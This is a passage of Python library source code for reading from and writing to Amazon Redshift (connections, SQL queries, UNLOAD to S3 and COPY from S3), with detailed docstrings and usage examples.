Optional[Dict[str, str]], ) -> Iterator[pd.DataFrame]: dfs: Iterator[pd.DataFrame] = s3.read_parquet( path=path, categories=categories, chunked=chunked, dataset=False, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) yield from dfs if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs ) def connect( connection: Optional[str] = None, secret_id: Optional[str] = None, catalog_id: Optional[str] = None, dbname: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ssl: bool = True, timeout: Optional[int] = None, max_prepared_statements: int = 1000, tcp_keepalive: bool = True, ) -> redshift_connector.Connection: """Return a redshift_connector connection from a Glue Catalog or Secret Manager. Note ---- You MUST pass a `connection` OR `secret_id`. Here is an example of the secret structure in Secrets Manager: { "host":"my-host.us-east-1.redshift.amazonaws.com", "username":"test", "password":"test", "engine":"redshift", "port":"5439", "dbname": "mydb" } https://github.com/aws/amazon-redshift-python-driver Parameters ---------- connection : Optional[str] Glue Catalog Connection name. secret_id: Optional[str]: Specifies the secret containing the connection details that you want to retrieve. You can specify either the Amazon Resource Name (ARN) or the friendly name of the secret. catalog_id : str, optional The ID of the Data Catalog. If none is provided, the AWS account ID is used by default. dbname: Optional[str] Optional database name to overwrite the stored one. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. ssl: bool This governs SSL encryption for TCP/IP sockets. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver timeout: Optional[int] This is the time in seconds before the connection to the server will time out. The default is None which means no timeout. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver max_prepared_statements: int This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver tcp_keepalive: bool If True then use TCP keepalive. The default is True. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver Returns ------- redshift_connector.Connection redshift_connector connection. Examples -------- Fetching Redshift connection from Glue Catalog >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() Fetching Redshift connection from Secrets Manager >>> import awswrangler as wr >>> con = wr.redshift.connect(secret_id="MY_SECRET") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() """ attrs: _db_utils.ConnectionAttributes = _db_utils.get_connection_attributes( connection=connection, secret_id=secret_id, catalog_id=catalog_id, dbname=dbname, boto3_session=boto3_session ) if attrs.kind != "redshift": raise exceptions.InvalidDatabaseType( f"Invalid connection type ({attrs.kind}. It must be a redshift connection.)" ) return redshift_connector.connect( user=attrs.user, database=attrs.database, password=attrs.password, port=int(attrs.port), host=attrs.host, ssl=ssl, timeout=timeout, max_prepared_statements=max_prepared_statements, tcp_keepalive=tcp_keepalive, ) def connect_temp( cluster_identifier: str, user: str, database: Optional[str] = None, duration: int = 900, auto_create: bool = True, db_groups: Optional[List[str]] = None, boto3_session: Optional[boto3.Session] = None, ssl: bool = True, timeout: Optional[int] = None, max_prepared_statements: int = 1000, tcp_keepalive: bool = True, ) -> redshift_connector.Connection: """Return a redshift_connector temporary connection (No password required). https://github.com/aws/amazon-redshift-python-driver Parameters ---------- cluster_identifier : str The unique identifier of a cluster. This parameter is case sensitive. user : str, optional The name of a database user. database : str, optional Database name. If None, the default Database is used. duration : int, optional The number of seconds until the returned temporary password expires. Constraint: minimum 900, maximum 3600. Default: 900 auto_create : bool Create a database user with the name specified for the user named in user if one does not exist. db_groups : List[str], optional A list of the names of existing database groups that the user named in user will join for the current session, in addition to any group memberships for an existing user. If not specified, a new user is added only to PUBLIC. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. ssl: bool This governs SSL encryption for TCP/IP sockets. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver timeout: Optional[int] This is the time in seconds before the connection to the server will time out. The default is None which means no timeout. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver max_prepared_statements: int This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver tcp_keepalive: bool If True then use TCP keepalive. The default is True. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver Returns ------- redshift_connector.Connection redshift_connector connection. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect_temp(cluster_identifier="my-cluster", user="test") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() """ client_redshift: boto3.client = _utils.client(service_name="redshift", session=boto3_session) args: Dict[str, Any] = { "DbUser": user, "ClusterIdentifier": cluster_identifier, "DurationSeconds": duration, "AutoCreate": auto_create, } if db_groups is not None: args["DbGroups"] = db_groups else: db_groups = [] res: Dict[str, Any] = client_redshift.get_cluster_credentials(**args) cluster: Dict[str, Any] = client_redshift.describe_clusters(ClusterIdentifier=cluster_identifier)["Clusters"][0] return redshift_connector.connect( user=res["DbUser"], database=database if database else cluster["DBName"], password=res["DbPassword"], port=cluster["Endpoint"]["Port"], host=cluster["Endpoint"]["Address"], ssl=ssl, timeout=timeout, max_prepared_statements=max_prepared_statements, tcp_keepalive=tcp_keepalive, db_groups=db_groups, ) def read_sql_query( sql: str, con: redshift_connector.Connection, index_col: Optional[Union[str, List[str]]] = None, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None, chunksize: Optional[int] = None, dtype: Optional[Dict[str, pa.DataType]] = None, safe: bool = True, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Return a DataFrame corresponding to the result set of the query string. Note ---- For large extractions (1K+ rows) consider the function **wr.redshift.unload()**. Parameters ---------- sql : str SQL query. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. index_col : Union[str, List[str]], optional Column(s) to set as index(MultiIndex). params : Union[List, Tuple, Dict], optional List of parameters to pass to execute method. The syntax used to pass parameters is database driver dependent. Check your database driver documentation for which of the five syntax styles, described in PEP 249’s paramstyle, is supported. chunksize : int, optional If specified, return an iterator where chunksize is the number of rows to include in each chunk. dtype : Dict[str, pyarrow.DataType], optional Specifying the datatype for columns. The keys should be the column names and the values should be the PyArrow types. safe : bool Check for overflows or other unsafe data type conversions. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- Reading from Redshift using a Glue Catalog Connections >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.read_sql_query( ... sql="SELECT * FROM public.my_table", ... con=con ... ) >>> con.close() """ _validate_connection(con=con) return _db_utils.read_sql_query( sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe ) def read_sql_table( table: str, con: redshift_connector.Connection, schema: Optional[str] = None, index_col: Optional[Union[str, List[str]]] = None, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None, chunksize: Optional[int] = None, dtype: Optional[Dict[str, pa.DataType]] = None, safe: bool = True, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Return a DataFrame corresponding the table. Note ---- For large extractions (1K+ rows) consider the function **wr.redshift.unload()**. Parameters ---------- table : str Table name. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. schema : str, optional Name of SQL schema in database to query (if database flavor supports this). Uses default schema if None (default). index_col : Union[str, List[str]], optional Column(s) to set as index(MultiIndex). params : Union[List, Tuple, Dict], optional List of parameters to pass to execute method. The syntax used to pass parameters is database driver dependent. Check your database driver documentation for which of the five syntax styles, described in PEP 249’s paramstyle, is supported. chunksize : int, optional If specified, return an iterator where chunksize is the number of rows to include in each chunk. dtype : Dict[str, pyarrow.DataType], optional Specifying the datatype for columns. The keys should be the column names and the values should be the PyArrow types. safe : bool Check for overflows or other unsafe data type conversions. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- Reading from Redshift using a Glue Catalog Connections >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.read_sql_table( ... table="my_table", ... schema="public", ... con=con ... ) >>> con.close() """ sql: str = f'SELECT * FROM "{table}"' if schema is None else f'SELECT * FROM "{schema}"."{table}"' return read_sql_query( sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe ) @apply_configs def to_sql( # pylint: disable=too-many-locals df: pd.DataFrame, con: redshift_connector.Connection, table: str, schema: str, mode: str = "append", overwrite_method: str = "drop", index: bool = False, dtype: Optional[Dict[str, str]] = None, diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, use_column_names: bool = False, lock: bool = False, chunksize: int = 200, commit_transaction: bool = True, ) -> None: """Write records stored in a DataFrame into Redshift. Note ---- For large DataFrames (1K+ rows) consider the function **wr.redshift.copy()**. Parameters ---------- df : pandas.DataFrame Pandas DataFrame https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name mode : str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. index : bool True to store the DataFrame index as a column in the table, otherwise False to ignore it. dtype: Dict[str, str], optional Dictionary of columns names and Redshift types to be casted. Useful when you have columns with undetermined or mixed data types. (e.g. {'col name': 'VARCHAR(10)', 'col2 name': 'FLOAT'}) diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). use_column_names: bool If set to True, will use the column names of the DataFrame for generating the INSERT SQL Query. E.g. If the DataFrame has two columns `col1` and `col3` and `use_column_names` is True, data will only be inserted into the database columns `col1` and `col3`. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. chunksize: int Number of rows which are inserted with each SQL query. Defaults to inserting 200 rows per query. commit_transaction: bool Whether to commit the transaction. True by default. Returns ------- None None. Examples -------- Writing to Redshift using a Glue Catalog Connections >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.to_sql( ... df=df, ... table="my_table", ... schema="public", ... con=con ... ) >>> con.close() """ if df.empty is True: raise exceptions.EmptyDataFrame() _validate_connection(con=con) autocommit_temp: bool = con.autocommit con.autocommit = False try: with con.cursor() as cursor: created_table, created_schema = _create_table( df=df, path=None, con=con, cursor=cursor, table=table, schema=schema, mode=mode, overwrite_method=overwrite_method, index=index, dtype=dtype, diststyle=diststyle, sortstyle=sortstyle, distkey=distkey, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, ) if index: df.reset_index(level=df.index.names, inplace=True) column_placeholders: str = ", ".join(["%s"] * len(df.columns)) schema_str = f'"{created_schema}".' if created_schema else "" insertion_columns = "" if use_column_names: insertion_columns = f"({", ".join(df.columns)})" placeholder_parameter_pair_generator = _db_utils.generate_placeholder_parameter_pairs( df=df, column_placeholders=column_placeholders, chunksize=chunksize ) for placeholders, parameters in placeholder_parameter_pair_generator: sql: str = f'INSERT INTO {schema_str}"{created_table}" {insertion_columns} VALUES {placeholders}' _logger.debug("sql: %s", sql) cursor.executemany(sql, (parameters,)) if table != created_table: # upsert if lock: _lock(cursor, [table], schema=schema) _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys) if commit_transaction: con.commit() except Exception as ex: con.rollback() _logger.error(ex) raise finally: con.autocommit = autocommit_temp def unload_to_files( sql: str, path: str, con: redshift_connector.Connection, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, region: Optional[str] = None, unload_format: Optional[str] = None, max_file_size: Optional[float] = None, kms_key_id: Optional[str] = None, manifest: bool = False, partition_cols: Optional[List[str]] = None, boto3_session: Optional[boto3.Session] = None, ) -> None: """Unload Parquet files on s3 from a Redshift query result (Through the UNLOAD command). https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- sql: str SQL query. path : Union[str, List[str]] S3 path to write stage files (e.g. s3://bucket_name/any_name/) con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. region : str, optional Specifies the AWS Region where the target Amazon S3 bucket is located. REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the same AWS Region as the Amazon Redshift cluster. By default, UNLOAD assumes that the target Amazon S3 bucket is located in the same AWS Region as the Amazon Redshift cluster. unload_format: str, optional Format of the unloaded S3 objects from the query. Valid values: "CSV", "PARQUET". Case sensitive. Defaults to PARQUET. max_file_size : float, optional Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3. Specify a decimal value between 5.0 MB and 6200.0 MB. If None, the default maximum file size is 6200.0 MB. kms_key_id : str, optional Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be used to encrypt data files on Amazon S3. manifest : bool Unload a manifest file on S3. partition_cols: List[str], optional Specifies the partition keys for the unload operation. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. Returns ------- None Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.unload_to_files( ... sql="SELECT * FROM public.mytable", ... path="s3://bucket/extracted_parquet_files/", ... con=con, ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ if unload_format not in [None, "CSV", "PARQUET"]: raise exceptions.InvalidArgumentValue("<unload_format> argument must be 'CSV' or 'PARQUET'") session: boto3.Session = _utils.ensure_session(session=boto3_session) with con.cursor() as cursor: format_str: str = unload_format or "PARQUET" partition_str: str = f"\nPARTITION BY ({",".join(partition_cols)})" if partition_cols else "" manifest_str: str = "\nmanifest" if manifest is True else "" region_str: str = f"\nREGION AS '{region}'" if region is not None else "" max_file_size_str: str = f"\nMAXFILESIZE AS {max_file_size} MB" if max_file_size is not None else "" kms_key_id_str: str = f"\nKMS_KEY_ID '{kms_key_id}'" if kms_key_id is not None else "" auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=session, ) sql = ( f"UNLOAD ('{sql}')\n" f"TO '{path}'\n" f"{auth_str}" "ALLOWOVERWRITE\n" "PARALLEL ON\n" f"FORMAT {format_str}\n" "ENCRYPTED" f"{kms_key_id_str}" f"{partition_str}" f"{region_str}" f"{max_file_size_str}" f"{manifest_str};" ) _logger.debug("sql: \n%s", sql) cursor.execute(sql) def unload( sql: str, path: str, con: redshift_connector.Connection, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, region: Optional[str] = None, max_file_size: Optional[float] = None, kms_key_id: Optional[str] = None, categories: Optional[List[str]] = None, chunked: Union[bool, int] = False, keep_files: bool = False, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Load Pandas DataFrame from a Amazon Redshift query result using Parquet files on s3 as stage. This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` to extract large Amazon Redshift data into a Pandas DataFrames through the **UNLOAD command**. This strategy has more overhead and requires more IAM privileges than the regular `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` function, so it is only recommended to fetch 1k+ rows at once. https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html Note ---- ``Batching`` (`chunked` argument) (Memory Friendly): Will enable the function to return an Iterable of DataFrames instead of a regular DataFrame. There are two batching strategies on Wrangler: - If **chunked=True**, a new DataFrame will be returned for each file in your path/dataset. - If **chunked=INTEGER**, Wrangler will iterate on the data by number of rows (equal to the received INTEGER). `P.S.` `chunked=True` is faster and uses less memory while `chunked=INTEGER` is more precise in the number of rows for each Dataframe. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- sql: str SQL query. path : Union[str, List[str]] S3 path to write stage files (e.g. s3://bucket_name/any_name/) con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. region : str, optional Specifies the AWS Region where the target Amazon S3 bucket is located. REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the same AWS Region as the Amazon Redshift cluster. By default, UNLOAD assumes that the target Amazon S3 bucket is located in the same AWS Region as the Amazon Redshift cluster. max_file_size : float, optional Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3. Specify a decimal value between 5.0 MB and 6200.0 MB. If None, the default maximum file size is 6200.0 MB. kms_key_id : str, optional Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be used to encrypt data files on Amazon S3. categories: List[str], optional List of columns names that should be returned as pandas.Categorical. Recommended for memory restricted environments. keep_files : bool Should keep stage files? chunked : Union[int, bool] If passed will split the data in a Iterable of DataFrames (Memory friendly). If `True` wrangler will iterate on the data by files in the most efficient way without guarantee of chunksize. If an `INTEGER` is passed Wrangler will iterate on the data by number of rows igual the received INTEGER. use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forward to botocore requests, only "SSECustomerAlgorithm" and "SSECustomerKey" arguments will be considered. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.unload( ... sql="SELECT * FROM public.mytable", ... path="s3://bucket/extracted_parquet_files/", ... con=con, ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ path = path if path.endswith("/") else f"{path}/" session: boto3.Session = _utils.ensure_session(session=boto3_session) unload_to_files( sql=sql, path=path, con=con, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, region=region, max_file_size=max_file_size, kms_key_id=kms_key_id, manifest=False, boto3_session=session, ) if chunked is False: df: pd.DataFrame = s3.read_parquet( path=path, categories=categories, chunked=chunked, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs ) return df return _read_parquet_iterator( path=path, categories=categories, chunked=chunked, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, keep_files=keep_files, ) def copy_from_files( # pylint: disable=too-many-locals,too-many-arguments path: str, con: redshift_connector.Connection, table: str, schema: str, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, parquet_infer_sampling: float = 1.0, mode: str = "append", overwrite_method: str = "drop", diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, serialize_to_json: bool = False, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, lock: bool = False, commit_transaction: bool = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> None: """Load Parquet files from S3 to a Table on Amazon Redshift (Through COPY command). https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html Note ---- If the table does not exist yet, it will be automatically created for you using the Parquet metadata to infer the columns data types. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- path : str S3 prefix (e.g. s3://bucket/prefix/) con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. parquet_infer_sampling : float Random sample ratio of files that will have the metadata inspected. Must be `0.0 < sampling <= 1.0`. The higher, the more accurate. The lower, the faster. mode : str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). serialize_to_json : bool Should Wrangler add SERIALIZETOJSON parameter into the COPY command? SERIALIZETOJSON is necessary to load nested data https://docs.aws.amazon.com/redshift/latest/dg/ingest-super.html#copy_json path_suffix: Union[str, List[str], None] Suffix or List of suffixes to be scanned on s3 for the schema extraction (e.g. [".gz.parquet", ".snappy.parquet"]). Only has effect during the table creation. If None, will try to read all files. (default) path_ignore_suffix: Union[str, List[str], None] Suffix or List of suffixes for S3 keys to be ignored during the schema extraction. (e.g. [".csv", "_SUCCESS"]). Only has effect during the table creation. If None, will try to read all files. (default) use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. commit_transaction: bool Whether to commit the transaction. True by default. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy_from_files( ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public" ... iam_role="arn:aws:iam::XXX:role/XXX" ... ) >>> con.close() """ autocommit_temp: bool = con.autocommit con.autocommit = False try: with con.cursor() as cursor: created_table, created_schema = _create_table( df=None, path=path, parquet_infer_sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, con=con, cursor=cursor, table=table, schema=schema, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, sortstyle=sortstyle, distkey=distkey, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, index=False, dtype=None, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) if lock and table == created_table: # Lock before copy if copying into target (not temp) table _lock(cursor, [table], schema=schema) _copy( cursor=cursor, path=path, table=created_table, schema=created_schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, serialize_to_json=serialize_to_json, ) if table != created_table: # upsert if lock: _lock(cursor, [table], schema=schema) _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys) if commit_transaction: con.commit() except Exception as ex: con.rollback() _logger.error(ex) raise finally: con.autocommit = autocommit_temp def copy( # pylint: disable=too-many-arguments df: pd.DataFrame, path: str, con: redshift_connector.Connection, table: str, schema: str, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, index: bool = False, dtype: Optional[Dict[str, str]] = None, mode: str = "append", overwrite_method: str = "drop", diststyle: str = "AUTO", distkey: Optional[str] = None, sortstyle: str = "COMPOUND", sortkey: Optional[List[str]] = None, primary_keys: Optional[List[str]] = None, varchar_lengths_default: int = 256, varchar_lengths: Optional[Dict[str, int]] = None, serialize_to_json: bool = False, keep_files: bool = False, use_threads: Union[bool, int] = True, lock: bool = False, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, max_rows_by_file: Optional[int] = 10_000_000, ) -> None: """Load Pandas DataFrame as a Table on Amazon Redshift using parquet files on S3 as stage. This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.to_sql()` to load large DataFrames into Amazon Redshift through the ** SQL COPY command**. This strategy has more overhead and requires more IAM privileges than the regular `wr.redshift.to_sql()` function, so it is only recommended to inserting +1K rows at once. https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html Note ---- If the table does not exist yet, it will be automatically created for you using the Parquet metadata to infer the columns data types. Note ---- In case of `use_threads=True` the number of threads that will be spawned will be gotten from os.cpu_count(). Parameters ---------- df: pandas.DataFrame Pandas DataFrame. path : str S3 path to write stage files (e.g. s3://bucket_name/any_name/). Note: This path must be empty. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. table : str Table name schema : str Schema name iam_role : str, optional AWS IAM role with the related permissions. aws_access_key_id : str, optional The access key for your AWS account. aws_secret_access_key : str, optional The secret key for your AWS account. aws_session_token : str, optional The session key for your AWS account. This is only needed when you are using temporary credentials. index : bool True to store the DataFrame index in file, otherwise False to ignore it. dtype: Dict[str, str], optional Dictionary of columns names and Athena/Glue types to be casted. Useful when you have columns with undetermined or mixed data types. Only takes effect if dataset=True. (e.g. {'col name': 'bigint', 'col2 name': 'int'}) mode: str Append, overwrite or upsert. overwrite_method : str Drop, cascade, truncate, or delete. Only applicable in overwrite mode. "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it. "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it. "truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle: str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). keep_files : bool Should keep stage files? use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} max_rows_by_file : int Max number of rows in each file. Default is None i.e. dont split the files. (e.g. 33554432, 268435456) Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> import pandas as pd >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy( ... 